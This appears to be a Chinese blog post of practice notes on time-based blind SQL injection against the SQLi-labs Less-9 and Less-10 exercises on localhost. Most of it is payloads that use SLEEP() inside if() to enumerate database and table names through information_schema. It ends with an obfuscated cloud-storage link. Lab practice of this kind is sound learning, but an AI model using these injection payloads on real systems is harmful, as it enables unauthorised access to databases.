sqllab爆库心得

sql lab 爆库 心得&＃xff08;建设中&＃xff09;

语句 爆 所有 表 名 快速 盲注

------------------------------------------------------------------&＃43;
SELECT table_name from information_schema.TABLES

select (SELECT count(table_name) from information_schema.TABLES WHERE table_name like"%coll%") > 0

select if( (SELECT count(table_name) from information_schema.TABLES WHERE table_name like"%coll%") > 1,1,0)

– http://localhost/Less-9/?id&＃61;1%27and%20if(select%20(SELECT%20count(table_name)%20from%20information_schema.TABLES%20WHERE%20table_name%20like%20%27coll%27)%20%3E%200,SLEEP(5),1)–&＃43;

– http://localhost/Less-9/?id&＃61;1’and if( (SELECT count(table_name) from information_schema.TABLES WHERE table_name like"%coll%") > 1,SLEEP(5),1)–&＃43;

浏览器中没有观察到延时 求解 #已解决

建议使用 hackbar 尽量提高效率

------------------------------------------------------------------&＃43;
------------------------------------------------------------------&＃43;
暴库
闭合猜测
– http://localhost/Less-10/?id&＃61;1%22%20and%20sleep(5)–&＃43;

select * FROM users where id &＃61; 1 and if( (SELECT count(SCHEMA_NAME) from information_schema.SCHEMATA WHERE SCHEMA_NAME like"%te%") > 0,SLEEP(5),0)

http://localhost/Less-10/?id&＃61;1" and if( (SELECT count(table_name) from information_schema.TABLES WHERE table_name like"%coll%") > 1,SLEEP(5),1)–&＃43;

-----------------------------------------------------------------&＃43;
付上百毒云资料库链接&＃xff1a;ht&＃x1f62b;tp&＃x1f62b;s://pan&＃x1f601;baidu&＃x1f44d;com&＃x1f62b;/s/&＃x1f68e;1BxQ&＃x1f62b;Pl2Yz&＃x1f62b;rg阿Kh&＃x1f62b;g13s&＃x1f62b;bd7dJQ
提取码&＃xff1a;h&＃x1f62b;y&＃x1f62b;qf
希望分享可以过go&＃x1f415;